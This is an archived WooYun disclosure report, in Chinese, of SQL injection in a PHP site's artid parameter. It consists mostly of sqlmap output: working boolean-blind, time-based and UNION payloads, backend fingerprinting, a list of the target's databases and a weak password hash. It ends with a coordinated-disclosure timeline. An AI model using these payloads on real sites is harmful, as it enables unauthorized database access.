乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
sqlmap进行注入
url:http://**.**.**.**/Articles_shows.php?artid=1371
[00:34:50] [INFO] resuming back-end DBMS 'mysql' [00:34:50] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: artid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: artid=1371 AND 1089=1089 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: artid=1371 AND (SELECT * FROM (SELECT(SLEEP(5)))osTJ) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: artid=-4205 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x4271595879697a656c6478717a4878526d5a706676517a4d6d76734a71664b79536a655a4b534b72,0x717a717071),NULL,NULL,NULL,NULL-- ----[00:34:51] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.2.3, Apache 2.2.4back-end DBMS: MySQL 5.0.12[00:34:51] [INFO] fetching current usercurrent user: 'root@localhost'[00:34:51] [INFO] fetching current databasecurrent database: 'cd2011chqgslhm'[00:34:51] [INFO] fetching database names[00:34:51] [INFO] the SQL query used returns 12 entries[00:34:51] [INFO] resumed: information_schema[00:34:51] [INFO] resumed: 962009dy@cdqydj[00:34:51] [INFO] resumed: cd2011chqgslhm[00:34:51] [INFO] resumed: cdsqyqxfj2012[00:34:51] [INFO] resumed: cdtlz@com2012[00:34:51] [INFO] resumed: cdtlz_articlescms[00:34:51] [INFO] resumed: keesoft_datask2010[00:34:51] [INFO] resumed: lqpop2011[00:34:51] [INFO] resumed: mysql[00:34:51] [INFO] resumed: phpmyadmin[00:34:51] [INFO] resumed: sq_fimiticoffice[00:34:51] [INFO] resumed: testavailable databases [12]: [*] 962009dy@cdqydj[*] cd2011chqgslhm[*] cdsqyqxfj2012[*] cdtlz@com2012[*] cdtlz_articlescms[*] information_schema[*] keesoft_datask2010[*] lqpop2011[*] mysql[*] phpmyadmin[*] sq_fimiticoffice[*] test
内容似乎很乱甚至还留下了一个test开发商也是有意思
内容似乎很乱甚至还留下了一个test开发商也是有意思扫描出包括一个弱口令的hash e10adc3949ba59abbe56e057f20f883e(123456)没有深入挖,水表已拆
你懂的
危害等级:中
漏洞Rank:8
确认时间:2016-01-15 15:37
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置.
暂无